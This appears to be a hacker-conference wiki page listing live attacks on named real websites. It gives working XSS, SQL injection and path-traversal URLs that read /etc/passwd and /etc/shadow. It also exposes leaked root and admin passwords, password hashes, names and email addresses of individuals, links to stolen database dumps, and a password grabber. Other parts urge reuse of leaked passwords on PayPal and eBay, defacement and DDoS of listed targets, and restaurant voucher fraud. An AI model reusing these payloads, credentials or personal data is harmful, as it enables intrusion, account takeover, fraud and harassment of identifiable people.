Views
Hacked
Contents |
Defaced
XSS
- http://bild5.de/users.php?a=forgotpwd (<img src=http://events.ccc.de/congress/2011/wiki/skins/behindenemylines/logo_klein.png> ins Feld Email) Auch: FIRST!
- http://www.zack-zack.com/html/detail/comments/questions.html?itemId=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
- http://ragequit-gaming.de/index.php?user-details-33 (registierung freigeben Hardwarefelder im Profil werden nicht richtig escaped)
- http://ka-nightlife.de/searchpic.php?sp_event_id=&sid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3Ca%20href=%22
- http://www.bistum-eichstaett.de/suche/?q="><script>alert("Behind+enemy+lines")<%2Fscript>
- http://www.bistummainz.de/bistum/suche.html?f_action=search&f_search_words="><script>alert("Behind+enemy+lines")<%2Fscript>
- http://www.bistum-hildesheim.de/bho/dcms/sites/bistum/suche.html?f_action=search&f_search_words="><script>alert("Behind+enemy+lines")<%2Fscript>
- http://www.dicverfurt.caritas.de/suche?searchquery="><script>alert("Behind+enemy+lines")<%2Fscript>
- http://www.erzbistum-bamberg.de/suche/index.html?f_action=search&f_search_words="><script>alert("Behind+enemy+lines")<%2Fscript>
- http://mentana-claimsoft.de/artforms/11.html Mentana-Claimsoft, DE-Mail provider, see here for details - probably also vulnerable CMS.
- http://www.wir-sind-kirche.de/index.php?searchfor=%3Cimg+src%3Dhttp%3A%2F%2Fevents.ccc.de%2Fcongress%2F2011%2Fwiki%2Fskins%2Fbehindenemylines%2Flogo_klein.png+%2F%3E&special=search&Submit=Suchen
- http://www.uni-freiburg.de/search?SearchableText=%22%3E%3C%2Fscript%3E+%3Cscript%3Ealert%28%22behind+enemy+lines%22%29%3C%2Fscript%3E
- http://fundsuche02.kivbf.de/MyApp.asp?wci=FundHeader&Mdt=Karlsruhe-VBK&format=&PLZ=%3Cimg%20src=%22http://events.ccc.de/congress/2011/wiki/skins/behindenemylines/logo_klein.png%22%3E (you have to convert all the %20 etc. by hand as mediawiki is a crap)
- http://www.musik-base.de/suche (Search field)
- http://www.filorama.com/search/?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E
- http://www.hostprofis.com/website/index.php?site=http://youporn.com&land=de
- http://www.lukas-erzett.de/produkte/head.php?lang=de&farbe=000&schrift=%3Cimg%20src=http://events.ccc.de/congress/2011/wiki/skins/behindenemylines/logo_klein.png%3E&head=./header.gif
- http://login.tf1.fr/src/identification.php?p=e3JlZmVyZXIgc3J2X2lkIHVudl9pZH0ge2h0dHA6Ly93d3cudGYxLmZyL3NlY3JldC1zdG9yeS9hY3R1LWxpdmUvIDI5NTUgIj48c2NyaXB0PmRvY3VtZW50LmxvY2F0aW9uLmhyZWY9Imh0dHA6Ly9jaG91Y3JvdXRlZ2FybmllLmZyL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEwLzA1L3VuaWNvcm5fMDEuanBnIjs8L3NjcmlwdD48YT0ifQ== (the nice picture is a bonus ;))
- http://www.swoodoo.com (departure/arrival input field)
- http://search.epfl.ch/process_web2010?engine=person&lang=en&q="><script>alert("Behind+enemy+lines")</script>
- http://whatsmyuseragent.com/
- use this as user agent: <img src=http://events.ccc.de/congress/2011/wiki/skins/behindenemylines/logo_klein.png>
- http://www.gulli.com/internet/tools/net/anonymitaetscheck
- use this as user agent: <img src=http://events.ccc.de/congress/2011/wiki/skins/behindenemylines/logo_klein.png>
- http://gudrunpieper.de/popup.php?url=http://www.art49.com/art49/art49wien.nsf/0/9EE400CEBCE11BCCC125704B003EC561/$file/Global_Porn.jpg or any site
- http://gudrunpieper.de/index.php?ka=1&ska=suche&suchwort=%22+onclick%3Dalert%28document.cookie%29+bla%3D%22&x=0&y=0
- NPD (right wing party):
- http://www.npd-bremen.de/index.php?s='--<script>alert("Behind+enemy+lines");</script>
- http://www.npd-saar.de/index.php?s='--<script>alert("Behind+enemy+lines");</script>
- http://www.npd-sachsen.de/index.php?s='--<script>alert("Behind+enemy+lines");</script>
- http://www.npd-fraktion-sachsen.de/?s='--<script>alert("Behind+enemy+lines");</script>
- Holger Apfel: http://www.holger-apfel.de/index.php?s='--<script>alert("Behind+enemy+lines");</script>
- SVP (swiss right wing party):
- http://www.svp.ch ( in search field: "><script>alert('Behind Enemy lines')</script> )
- not working for me, but this works: "><img src=http://events.ccc.de/congress/2011/wiki/skins/behindenemylines/logo_klein.png>
- http://www.svp.ch ( in search field: "><script>alert('Behind Enemy lines')</script> )
- XSS x6 : www.2xfun.de
- sqli works also
- http://www.2xfun.de/view.php?file=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
- https://www.cia.gov/search?q=Over%209000%20Lulz+%40+%2328c3!%22style%3D%22background:lime;text-align:center;font-size:80px;position:absolute;width:900px
- http://uavsar.jpl.nasa.gov/cgi-bin/data.pl?sitename_search=%22%3E%3Cscript%3Ealert%28%22Maximum%20Lulz%20%40%20%2328c3%22%29%3C/script%3E
- http://www.black-flirt.de allows <SCRIPT> tags in profiles (script in lowercase gets filtered tho)
- KSV (Something like Schufa):
- Evangelische Kirchengemeinde Urmitz-Mülheim (Mouseover on dropdown-box) http://www.evangelkium.de/web/index.php?option=com_search&searchword=aaa&searchphrase=any&ordering=newest%22%20onmouseover={alert%28/Guess_we_are_behind_enemy_lines/%29}%20onmouseout=alert%28document.cookie%29%20style=position:fixed;top:33%;left:33%;width:33%;height:33%;%22
- http://www.wochenblatt.de/service/suche/ in der Suchfinktion eingeben: ><script>alert('XSS');</script>
SQL INJ
- highscore hacking @ http://olologames.com/highscores.php?id=91241512%20UNION%20SELECT%201,table_name,3,4,5,6,7,8,9,10,11,12%20FROM%20INFORMATION_SCHEMA.tables%20LIMIT%2060,1--
- Statistikamt Nord: http://www.statistik-nord.de/fileadmin/regional/regional.php?MERKMALE=A&JAHRE=12009&HAMBURG=255003%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2019,1--&AUSGABE=B&STARTEN=Anfrage+starten
- thats not a bug, thats a feature!
- die haben auch kram zu zensus 11 gespeichert. lulz.
- database dump: http://www.mediafire.com/?wht67ewrd7dn9oh
- http://www.statistik-nord.de/fileadmin/wahldb/results.php?action=fuckup&voteid=1
- no sqlinjection but some xss possible: http://www.statistik-nord.de/fileadmin/wahldb/voteinfo.php?type=voteinfo&data=fuckup%7C28c3%7C%7C28c3%7C28c3%7C28c3%7C28c3%7C28c3
- Search.co.uk: https://www.search.co.uk/jobs/results/?__VIEWSTATE=%2FwEPDwUJMTU0NTI1Njc0ZGQ%3D&searchQuery=go&keywords=%22&l_c=City%2FTown&p_c=Postcode&radius=§or=-1&jobType=-1&goButton=
- A MS SQL specialist can do the rest
- https://my.mc-shelf.de/login.php?filiale=blabla - die Datenbank wird anhand der Filiale ausgewählt. Das klappt natürlich nicht wenn man ne falsche Datenbank angibt. Da gibt es mit Sicherheit noch mehr!
- https://my.mc-shelf.de/registrieren/index.php - enter valid results and change in tamperdata afterwards. do not change username, password and filiale.
- http://www.fliege.de/zeitschrift/artikel.php?artikel=%27ff%22ff
- http://fickenvz2.net/action_register.php?link=2
- http://fickenvz2.net/admin/dbadmin/ user: bernd | pass: aaa4kzxyz
- SQL Dump: http://www.mediafire.com/?2099pw7ofu85p6l
- not complete!
- in der Datenbank gibt es auch sexfreunde.net und tattoovz.net
- direkter Link zu Profilbildern ist immer http://[domain].net/photo/[$db_query["photo"]].jpg
- http://www.2xfun.de/view.php?file=4652' , accept no limit :-)
- Database name is "fun"
- Useful also for xss
- http://www.flirttoday.de/show_single.php?id=28c3%27%29%29+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65--+UPPER%28%27A
- litle Passwordgrabber (one error in code ;) ) http://nopaste.me/paste/9977556424efc84f6da2a3
- http://www.ems-group.com/ext_newsinhalt.cfm?id=121&newsid=1802' //error based
NPD
<nohackerethik>
- NPD (right wing party):
- http://www.frank-franz.de - the programmer, great job guy! ask digitask if you need a new job. He used the same password everywhere ;)
- 1:Frank Franz:naweko:997564b4180f8fa9e41649b9a705ed3c:kontakt@naweko.de
- http://www.npd-bremen.de/index.php?s=5'%20or%201=0-- just have fun ;o) databse-name: npdbremen_ ;-)
- 1:Frank Franz:naweko:997564b4180f8fa9e41649b9a705ed3c:kontakt@naweko.de
- 2:Matthias Faust:matthiasfaust:c2455e34cd9d47951100bd21cabd8c9d:matthiasfaust@gmail.com
- 3:Sascha Humpe:saschahumpe:f62af2d3d17ef0a7aa4422db1558f0b0:humpe22@arcor.de
- http://www.npd-saar.de/index.php?s=5'%20or%201=0-- seems to be the same
- 1:Frank Franz:naweko:997564b4180f8fa9e41649b9a705ed3c:kontakt@naweko.de
- http://www.npd-sachsen.de/index.php?s=5'%20or%201=0-- No further questions your honor.
- 4:Frank Franz:naweko:997564b4180f8fa9e41649b9a705ed3c:kontakt@naweko.de
- 5:Andreas Storr:medien#storr:7e54eb2bd89f13c226ba6ce8fa950cc5:andreas.storr@slt.sachsen.de
- 6:Holger Szymanski:presse#szymanski:8289bb4fa9496b377a15f5804bde1b95:holger.szymanski@slt.sachsen.de
- 7:Arne Schimmer:presse#schimmer:fd90888666214c40114c94a538837083:arne.schimmer@slt.sachsen.de
- 11:Hiekisch:Torsten:d42b67ffb794a716896dde521c8583fb:hiekisch@fuer-sachsen.de
- 9:Jens Baur:LGS:a18f34978b561da0f33852837e9560b8:lgs2@npd-sachsen.de
- 10:Zasowk, Ronny:Ronny:12ecf3a3ed405ff4c5e04d17d0a42d2c:lausitz1986@web.de
- 12:Mirko Beier:Beier:f2be31577bf0822e55db32ad1f89ad7a:mirko.beier@web.de
- http://www.npd-fraktion-sachsen.de/?s=5'%20or%201=0--
- http://www.npd-fraktion-sachsen.de/?s=-5%27%20U%4EIO%4E%20S%45L%45CT%201,2,%273 (HTML Enc. because of "IDS"/"IPS" -- same stupid mistake as last year) (should work for other npd-* sites)
- Tables http://nopaste.me/paste/16661974184efcfb709fa16
- Columns http://nopaste.me/paste/2977784944efcfc0bd7e67
- Kontakt submissions http://www.mediafire.com/?8pqc79oxr3qc9s0 (seperator is ;;)
- 1:Frank Franz:naweko:997564b4180f8fa9e41649b9a705ed3c:kontakt@naweko.de
- 2:Thorsten Thomsen:thorstenthomsen:dadcc5b6ad1b4775a080f3d1e46a32ca:Thorsten.Thomsen@slt.sachsen.de
- 3:Susan Staudte:Susan:ffa8e4323f786bcad9d215e03e97b1bb:Susan.Staudte@slt.sachsen.de
- 4:Jörg Hähnel:joerghaehnel:f7a422852fa4d05ac6d43b09ce062b49:grafik@npd.de
- 5:Szymanski:Szymanski:169d1adb0b3117c3c0a551f46a83bd41:holger.szymanski@slt.sachsen.de
- Holger Apfel: http://www.holger-apfel.de/index.php?s=%Inject_Here%5 DB Server: MySQL >=5 Current DB: holgerapfel_ Admin Panel: http://www.holger-apfel.de/admin/
- 1:Frank Franz:naweko:997564b4180f8fa9e41649b9a705ed3c:kontakt@naweko.de
- 2:Jörg Hähnel:joerghaehnel:88d456439bc5fd4bc8d8cd16afc37613:grafik@npd.de
- 3:Holger Apfel:holgerapfel:91a33a16edc2f52a370e2acd034c4f91:holger.apfel@slt.sachsen.de
- 4:Patrick Kallweit:patrickkallweit:cab2ebe10609f28f5815b068ebaa6aa8:p.kallweit@hotmail.de
- http://www.npd-bremerhaven.de
- 1:Frank Franz:naweko:997564b4180f8fa9e41649b9a705ed3c:kontakt@naweko.de
- 2:Matthias Faust:matthiasfaust:c2455e34cd9d47951100bd21cabd8c9d:matthiasfaust@gmail.com
- 3:Sascha Humpe:saschahumpe:f62af2d3d17ef0a7aa4422db1558f0b0:humpe22@arcor.de
- http://www.juergen-gansel.de
- 1:Frank Franz:naweko:997564b4180f8fa9e41649b9a705ed3c:kontakt@naweko.de
- 2:Jörg Hähnel:joerghaehnel:88d456439bc5fd4bc8d8cd16afc37613:grafik@npd.de
- 3:Holger Apfel:holgerapfel:91a33a16edc2f52a370e2acd034c4f91:holger.apfel@slt.sachsen.de
- 4:Patrick Kallweit:patrickkallweit:cab2ebe10609f28f5815b068ebaa6aa8:p.kallweit@hotmail.de
- http://www.gfp-netz.de
- 1:Frank Franz:naweko:997564b4180f8fa9e41649b9a705ed3c:kontakt@naweko.de
- NPD flyer hacked
</nohackerethik>
Church
- http://www.weiterwissen.at just got the Hans-Peter-Friedrich-Preis for using a 7 years old, unfixed cms software, exposing db content incl. cms root access.
- http://www.kaoe.at - using the same cms with the very same flaws ... oh my god, who's their web admin?
- http://www.kfb.at - ooops, same admin, same root pwd pattern
- http://www.teilen.at ...
- keine kirche, aber gleiches cms, gleiche firma, gleiches pw? http://www.oejab.at/ anyone?
- Done: http://www.oejab.at/site/de/ueberdieoejab
- wo wir schon dabei sind: http://www.jusos.at/content/tir/impressum/index.html u.ä., siehe google nach „Programmierung: AGENTUR ZEITPUNKT Mediendesign- und produktion GmbH“ http://goo.gl/alT3c scheinbar immer das gleiche cms... (die agentur selber benutzt es auch: http://zeitpunkt.com/ )
Food
- Burgerking survey automation: http://176.99.140.56/bkfb.php (https://www.bk-feedback-de.com)
- use an old receipt and note the generated code on it to get a menu with burger, fries and drink for only 2€ (instead of 4€).
- Please write the id of a nearby store here in the wiki for us to update the default values. The current default is somewhere in Saxony.
- 16233 should be the the store at Alexanderplatz
- Thanks, script updated
- Go to http://www.burgerking.de/restaurants enter adress click label and when u hover over "Mehr erfahren" you'll see the ID
- 16233 should be the the store at Alexanderplatz
- For Q&A come to the very back of the hackcenter, farthest-away corner.
- Where's the source of the PHP script?
- The Code can be calculated!
- It's actually just a prefix of 2 letters and a number divisible by 3 without remainder (modulo 3(%3))
- The prefix changes around every month everything else stays the same way
- The webpage is very simple you can just click on the next button all the time the data isn`t necessary (first page 3 times all other pages 2 times)
- still works for some vouchers (just try): http://bk2rox.bk.funpic.de/bk/bk.php
- Don't use the fries voucher, it gets refused and so do all others you bring in. The 2 BigKing XXL one works without problems. For 50 Cents more you can make it maxi. :)
- Now that BK has apps for your smartphone you don't even have to print them. Just hold your phone in your hand and tell them the PLU. Best to use their app anyways.
- I propose a DDos on the Edeka (Reichelt) store in the basement of the alexa-shopping-center. They sell club-mate really cheap: 20x0.5l Mate for about 14. Euro. Go and get your mate :D
misc
- http://fundsuche02.kivbf.de/MyApp.asp?wci=Suche1&Mdt=Karlsruhe-VBK
- http://www.orial.fr/cabinet-expertise-comptable/dl.jsp?file=../../../../../../../etc/shadow
- ssh / webmin user:root pwd:56ef6e456e
- http://www.careo.biz/careo/dl.jsp?file=../../../../../../../../etc/shadow
- http://www.laengsynt.de/laengsynt/
- Visitor of the 28C3 who appearently wasn't able to secure his MacBook
- http://nationales-versandhaus.de/
- Database Dump: http://www.mediafire.com/?eebjmw0japd914a
- passwords: http://pastebin.com/jmWgyqww / left: http://pastebin.com/jspPUYvc
- Database converted to sqlite3: http://www.file-upload.net/download-3983681/db_hering_shop-20111227160754.sqlite3.gz.html
- Customer-Map of german customersFile:Nv customer map.pdfwithout 119 non german customers( like some Austria)
- Morons with web.de accounts and same password: http://pastebin.com/ES69GGWu
- Morons with gmx* accounts and same password: http://pastebin.com/3Qsjd1jp
- Morons with yahoo accounts and same password: http://pastebin.com/4pk7QSQ0
- Passwords mostly also same for: paypal, ebay, facebook, meinvz, ... Try it and have some fun!
- somethings wrong with my favorite twitter clone? http://identi.ca/install.php
- http://nsfkn.info/wp-login.php
- user: admin pass:test12345 //happy defacing!
- db dump: http://www.sendspace.com/file/fyly0l
- http://sh.ch/robots.txt
- Kanton Schaffhausen in Switzerland, already was like this last congress, told them, they didn't fix it. Take a look what interesting stuff you can find
- http://sh.ch/fileadmin/Logfile/logfile.txt (~3gb Apache Logfile)
- [mirror in progress]
- typo 3 V4.4 located here: https://sh.ch/typo3/index.php
- http://www.laden.didymos.de/index.php?s=/etc/passwd
- Hosting Srv. bei Sch(l)und & Partner
- http://harzflirt.de sponsors http://chaosbay.congress.ccc.de/harzflirt_from_28c3.tar.gz.torrent the second year in a row free fa(c/k)ebook profile pics.
- Original Harzmash at http://harzmash.heroku.com/
- http://www.birdsandmore.de/shop/index.php?file=../../../../../../../etc/passwd
- http://www.maurermeisterklinger.de/index.php?file=../../../../../../../../../../etc/passwd
- http://karasam.giresun.edu.tr/index.php?jumpurl=typo3conf/localconf.php&juSecure=1&type=0&juHash=e91be2a7af&locationData=1:
- old TYPO3 jumpurl bug m(
- http://knowledgenet.org/index.php?file=../../../../../../../etc/passwd
- http://www.ufw.org/_page.php?inc=../../../../../../../../../etc/passwd
- http://www.genhound.co.uk/genped_inf.php?inc=../../../../../../../../../etc/passwd
- http://www.mainz05.de/liveticker.html?&cHash=d1cbe1f97e&tx_nidagseason_pi8[match_id]=3288
- DB Name:www_mainz05_de //\\ User dump: http://tinyurl.com/784427o
- Halbmond statt Gipfelkreuz!
- http://ldscgroup.com/index.php?inc=../../../../../../../../../../etc/passwd
- http://www.black-flirt.de/includes/ajax.php?src=/etc/passwd
- http://www.black-flirt.de/images/user_pics/ 10MB index.html of profile pics torrent: small pics: http://chaosbay.congress.ccc.de/black-flirt.tar.gz.torrent large pics: http://chaosbay.congress.ccc.de/black-flirt-userpics.torrent
- phpinfo: http://www.black-flirt.de/info.php
- apache conf: http://www.black-flirt.de/includes/ajax.php?src=/www/apache/conf/virtualhosts.conf
- mysql: http://db.black-flirt.de/setup/index.php
- AuthName www.heartbangers.de
- AuthUserFile /www/documents/www.heartbangers.de/access/stats.user
- htaccess: oomedia:IBsZAMhHn6zRc / bfstats:oGiBLGjMBUNBI / bujack:IffBsXtFEGwvY
- cracked: breidenbach:M1ll3n1u
- cracking at the moment... but only with an i7-2620M
- wordpress at http://www.black-flirt.de/blog
- ServerAlias db.black-flirt.de
- DocumentRoot /www/documents/mysqladmin-www037.oberberg.net/docs
- http://www.black-flirt.de/index.php?show=new_user_check lulz! with some funny comments
- http://www.ostfrieseninfo.de/ndx.php?pg=../../../../../../../../../../etc/passwd
- http://www.vfl-ockenhausen.de/ndx.php?pg=../../../../../../../../../../etc/passwd
- http://www.immobilien-petersen-ostfriesland.de/index.php?s=../../../../../../../../../etc/passwd
- http://www.waterborg.de/index.php?s=../../../../../../../../../etc/passwd
- http://praezisrohr.smp-tubes.com
- http://www.johnoldfield.co.uk/parse.php?file=../../../../../../../../../etc/passwd
- http://www.oberberg-online.com/
- http://www.hungryflix.com/sql/localhost.sql omg, it's full of passwords
- just in case: http://www.sendspace.com/file/hym20x
- https://www.myksv.at/NASApp/web/KSV/1870/ maybe fun
- http://erzabtei-beuron.de/schott/schott_anz.php?file=/etc/passwd
- Schober (Datenkraken) http://shop.schober.com/branchenbaum/get_external_XML.php
- POST searchvalue=aaa&landcode=CH&language=en'&path=/var/www&branchtype=EBC
- User: saoecp@localhost
- DB: intadlo
- Hashes:
- dbbackup : 0c876deb0ae1121e
- lleclerc : 49ECA5B1AD01D67406A116A5630196E60B99A4CA
- root : 0c876deb0ae1121e //found: s403cp
- password hash: 0c876deb0ae1121e
- password hash: 0c876deb0ae1121e
- saoecp : 380FB07139784F96C2717DD4BC30F04BD5AECFB1
- password hash: 0c876deb0ae1121e
- password hash: 0c876deb0ae1121e
- password hash: 0c876deb0ae1121e
- password hash: 0c876deb0ae1121e
- password hash: 0c876deb0ae1121e
- password hash: 4fd4aea86377013c //found: lleclerc
- password hash: 6d45e33b28aafc93 //found: useibel
- http://www.klaeui-web.ch/
- http://welsimbild.at/
- ftp://ip-89-102-75-5.net.upcbroadband.cz/part0/GREETINGS_FROM_28C3/ free FTP (7.6 TB) anyone?
- ftp://ip-89-102-75-5.net.upcbroadband.cz/part0/Talks // share ALL the conference recordings !!111
- btw: cheap loans 4all ftp://ip-89-102-75-5.net.upcbroadband.cz/part0/GREETINGS_FROM_28C3/NOT_BAD_WULFF.jpg
- http://www.st.ewi.tudelft.nl/~mathijs/frame.php?file=../../../etc/passwd&topic=0wnd
- www.yogo.ed.jp
Targets
- http://www.Klarschiff-kiel.de ( Streetart fascism)
- http://www.hoststar.ch (Apache 1.3.36 Server and the Webhoster won't update - have fun!)
- https://www.gema.de/ because of http://twitter.com/#!/search/28c3%20fnord%20gema
- http://logr.org because it's an 'autonomous' neonazi hoster with hundreds ogr.org of blogs
- http://www.widerstand-weiden.de
- http://carders.cc/forum.php disguisting german fraud board (they sell weapons, drugs, child porn, credit cards)
- http://ccc-ossendorf.de/
- 188.21.80.77 // gentoo system, alles erlaubt .. Bandbreite ist beschränkt
- Begründung: Die Server werden nächste Woche platt gemacht und verkauft aber davor geb ich sie zum Abschuss frei. ;)
-
http://nsfkn.info/ Freie Kräfte NRP//done (see misc section) - http://infoportal-potsdam.net because this nazi page offer pics of antifacist people
- http://wwwfh.fh-heidelberg.de/satellit/ - because they suck (C3 is not your personal army)
- http://fpoe.at - and all sites related to that - coz its a far ight party in .at
- http://bzoe.at - see above ;)
- http://asos.de/ / http://asos.com/ are still sending lost passwords back in plaintext ( -> same reason as DHL)
-
http://mc-shelf.de/- playing with peoples money - kreuz.net - http://kreuz.net/article.12650.html (n33d moar 1337z: http://kreuz.net/article.14437.html)
- http://www.michaelbraun-mda.de/ - because he takes satisfaction in suing the hell out of penniless people...
- http://gudrunpieper.de because of http://www.ndr.de/regional/niedersachsen/hannover/landtag797.html
- http://www.koch-mehrin.de/ plagiarism - another word for backup…
- Auf Wordpress aufgebaut (Wordpress 2.8.4)
- http://fdp-stormarn.de/ see above
- Joomla
- http://mentana-claimsoft.de/artforms/11.html Mentana-Claimsoft, because they are a DE-Mail provider but too incompetent to secure their own web site. see here for details - xss is known, but probably also has a vulnerable CMS.
- http://nw-berlin.net/ Nationaler Widerstand Berlin - militant nazi scum (Wordpress 3.3)
- http://www.chronik-berlin.com/ Black List from Nazis - they use it for attacks in the past month
- http://info-rostock.org/ - militant nazi scum from rostock (Wordpress 3.0.3)
- http://www.mupinfo.de/ - right wing news page, closely linked to npd (right wing party) (Wordpress 3.3)
- http://www.levensboom.de/ - nazi mail order
- http://www.spahnblog.de/?p=21 - MdB Jens Spahn (CDU) - Big Fan of Atomic Waste and Private Health Insurances (Wordpress 3.2.1)
- I'm searching someone, who can help my analysing some public transport tickets from Norway (Oslo and Bergen). I've got some tickes as examples, but no RFID reader. conact rfid_norway@jabber.ccc.de
- http://oskar.sw1.ch because he is an ass
- http://resistore.org west-german nazistore with relevance
- http://achgut.com und rbb, grund: vor einigen Wochen wurde die kritische Radiosendung ken fm abgesetzt unter fadenscheinigen Antisemitismusvorwürfen von islamophoben neokonservativen Stimmen. Absichtlich verwechselt wurde Kritik an der Politik Israels mit Antisemitismus. Klebeband: http://www.youtube.com/watch?v=AGm-drLdZOk http://www.youtube.com/watch?v=ne1AjVWGAe4
- http://forum.thiazi.net/ nationalist shit.
- vBulletin 3.8.7
- thiazi.net mail:
- https://gist.github.com/4320b75d398f2e1f074d real life ctf
- http://www.htw-saarland.de Hochschule für Technik(!) und Wirtschaft in Saarbrücken. Per default ist das Passwort für den Webmailer "mail$(MATRIKELNUMMER)" und der User $(STUDIENGANG, z.B. BMT für biomedizinische Technik).$(VORNAME).$(NACHNAME)@htw-saarland.de. Der VPN-User heißt $(ERSTER BUCHSTABE VORNAME)$(NACHNAME) und das zugehörige PW ist einfach "User$(Matrikelnummer (7 stellig, numerisch)).
- http://www.germania-sb.de/ Burschenschaft, organisiert im Dachverband deutsche Burschenschaft, pflichtschlagend, nationalistisch
- BDP (swiss party they suck...):
- SP (swiss left wing party):
- Vatikan (deface it with Pedo Bear)
- Catholic Church (deface it with Pedo Bear)
- Fundamentalistic Terror (deface with much porn :)
- http://www.iran-air.de/ remember lockerby
- http://www.president.ir/en/ free iran , no Achmadinedschan
- http://www.palestine-info.info/ free palestine without Hamas and hisbullah
- Loewe Sicherheits AG (CEO is a Known liar and reckless swindler)